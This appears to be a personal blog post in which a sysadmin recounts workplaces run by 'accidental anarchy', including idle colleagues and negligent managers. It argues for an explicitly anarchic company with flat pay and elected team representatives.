There was one time where a helpdesk worker who was about to be laid off was assigned to the same office as me (apparently making all the people in his group redundant took some time). So I started teaching him sysadmin skills, assigned work to him, and then recommended that my manager get him transferred to my group. That worked well for everyone.

One difficult case is employees who get in the way of work being done, those who are so incompetent that they break enough things to give negative productivity. One time when I was working in Amsterdam I had two colleagues like that, it turned out that the company had no problem with employees viewing porn at work so no-one asked them to stop looking at porn. Having them paid to look at porn 40 hours a week was much better than having them try to do work. With anarchy there’s little option to get rid of bad people, so just having them hang out and do no work was the only option. I’m not advocating porn at work (it makes for a hostile work environment), but managers at that company did worse things.

One company I worked for appeared (from the non-management perspective) to have a management culture of doing no work. During my time there I did two “annual reviews” in two weeks, and the second was delayed by over 6 months. The manager in question only did the reviews at that time because he was told he couldn’t be promoted until he got the backlog of reviews done, so apparently being more than a year behind in annual reviews was no obstacle to being selected for promotion. On one occasion I raised the issue of a colleague who had done no work for over a year (and didn’t even have a PC to do work) with that manager, his response was “what do you expect me to do”! I expected him to do anything other than blow me off when I reported such a serious problem! But in spite of that strictly work-optional culture enough work was done and the company was a leader in it’s field.

There has been a lot of research into the supposed benefits of bonuses etc which usually turn out to reduce productivity. Such research is generally ignored presumably because the people who are paid the most are the ones who get to decide whether financial incentives should be offered so they choose the compensation model for the company that benefits themselves. But the fact that teams can be reasonably productive when some people are paid to do nothing and most people have their work allocated by group consensus rather than management plan seems to be a better argument against the typical corporate management.

I think it would be interesting to try to run a company with an explicit anarchic management and see how it compares to the accidental anarchy that so many companies have. The idea would be to have minimal management that just does the basic HR tasks (preventing situations of bullying etc), a flat pay rate for everyone (no bonuses, pay rises, etc) and have workers decide how to spend money for training, facilities, etc. Instead of having middle managers you would have representatives elected from each team to represent their group to senior management.

PS Australia has some of the strictest libel laws in the world. Comments that identify companies or people are likely to be edited or deleted.